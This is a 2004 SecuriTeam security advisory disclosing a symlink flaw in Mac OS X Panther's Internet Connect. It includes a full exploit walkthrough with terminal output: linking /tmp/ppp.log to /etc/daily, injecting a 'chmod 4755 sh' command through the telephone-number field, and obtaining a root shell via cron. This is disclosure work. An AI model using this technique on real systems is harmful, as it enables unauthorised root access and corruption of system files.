[NEWS] Mac OS X Panther Internet Connect Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 07/27/04

  • Next message: SecuriTeam: "[NEWS] Opera Address Bar Spoofing Issue Revisited" 
    To: list@securiteam.com
Date: 27 Jul 2004 19:25:39 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Mac OS X Panther Internet Connect Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    The Internet Connect Application in Mac OS X is used to dial to the
    Internet. A vulnerability in Internet Connect allows a malicious user to
    write to any file in the system, thus gaining elevated privileges.

    DETAILS

    Vulnerable Systems:
     * Panther 10.3.4 - Internet Connect version 1.3 (Possibly others)

    The Internet Connect application creates a ppp.log file in /tmp/
    directory. If the file already exists it is append to, otherwise a new
    file is created. It is possible to trick Internet Connect into appending
    data to any file in the system by creating a symbolic link file by the
    name /tmp/ppp.log and pointing to the file to be altered.

    If the file /tmp/ppp.log already exists, the attack is not possible as the
    file is owned by user 'root' and group 'wheel'. However, due to the
    operating system clearing the /tmp directory during system startup and
    during regular maintenance, it becomes possible to form the attack as
    shown below:

    First a file is created to represent a system file, owned and only
    write-able by user 'root'.
    maki:~ # echo "TEST" > /etc/file_owned_by_root
    maki:~ # ls -l /etc/file_owned_by_root
    -rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/file_owned_by_root
    maki:~ # cat /etc/file_owned_by_root
    TEST

    A symbolic link is now created in the '/tmp' directory to point to the
    file to be altered. It is important to note that the link can be created
    as a non 'admin' or 'root' user.
    maki:/tmp $ id
    uid=502(br00t) gid=502(br00t) groups=502(br00t)
    maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log
    maki:/tmp $ ls -l ./ppp.log
    lrwxr-xr-x 1 root wheel 23 25 Jul 00:11 ./ppp.log@ ->
    /etc/file_owned_by_root

    Now Internet Connect is opened. Under 'configuration' choose 'Other'.
    Enter some text into the 'Telephone Number' box (B-r00t r0x y3r w0rld!)
    and click 'Connect'.
    'Cancel' can be clicked several seconds later.
    Checking the original file '/etc/file_owned_by_root' we see the following:
    maki:~ $ cat /etc/file_owned_by_root
    TEST
    Sun Jul 25 00:20:42 2004 : Version 2.0
    Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
    Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
    Sun Jul 25 00:20:58 2004 : Serial link disconnected.

    As can be seen, data has been appended to the 'protected' file.

    Impact:
    It is possible for a local user to escalate their privileges by appending
    data to specific system files. In addition, a malicious user may be able
    to render the machine unusable by corrupting important system files.

    Exploit:
    This demonstration appends commands to the '/etc/daily' file that is
    executed by default at 3:15AM each day. An alternative attack might
    involve appending to any of the files that are sourced at system start up
    such as '/etc/rc.common'. This latter method is convenient if the user is
    able to reboot the machine.

    Create our link:
    maki:~ $ ln -s /etc/daily /tmp/ppp.log

    Open Internet Connect by Internal Modem -> Configuration -> Other

    Internet Connect only allows certain characters to be used for the
    telephone number. The background '&' character allows our command string
    to execute even though they are prefixed by text we cannot control.

    Under the Telephone Number field enter:
    & cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh &

    Click 'Connect' ... and wait (10secs) ... press 'Cancel'

    If we check the content of the '/etc/daily' file:
    maki:~ $ tail /etc/daily
    if [ -f /etc/security ]; then
    echo ""
    echo "Running security:"
    sh /etc/security 2>&1 | sendmail root
    fi
    Sun Jul 25 03:10:11 2004 : Version 2.0
    Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. && cd ..
    && cd bin && chmod 4755 sh &
    Sun Jul 25 03:10:15 2004 : Terminating on signal 15.
    Sun Jul 25 03:10:17 2004 : Serial link disconnected.

    All we need to do now is sit back and wait for cron to execute
    '/etc/daily'.

    maki:~ $ date
    Sun Jul 25 03:13:43 CEST 2004
    maki:~ $ cd /bin
    maki:/bin $ ls -l sh
    -r-xr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
    maki:/bin $ date
    Sun Jul 25 03:15:50 CEST 2004
    maki:/bin $ ls -l sh
    -rwsr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
    maki:/bin $ sh
    maki:/bin # id
    uid=502(br00t) euid=0(root) gid=502(br00t) groups=502(br00t)

    All that is left to do is clean up '/etc/daily' and remove the link
    '/tmp/ppp.log'.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:br00t@blueyonder.co.uk>
    B-r00t.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Opera Address Bar Spoofing Issue Revisited"

    Relevant Pages